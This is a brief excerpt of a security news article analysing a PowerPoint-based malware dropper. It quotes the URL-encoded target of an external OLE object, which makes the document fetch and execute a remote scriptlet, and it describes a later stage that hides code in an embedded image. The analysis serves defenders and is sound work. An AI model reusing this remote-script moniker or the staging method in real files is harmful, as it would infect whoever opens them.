Using Microsoft Powerpoint as Malware Dropper
Security Affairs
NOVEMBER 16, 2018
An external OLEobject (compatibility 2006) was available on that value: Target=”%73%63%72%49%50%54:%68%74%74%70%73%3A%2F%2F%61%2E%64oko%2Emo%65%2Fwr%61%65o%70%2E%73%63%74″ . The Third stage uses an internal resource (which happens to be an image) to read and execute additional code: the final payload or Stage 4.
Let's personalize your content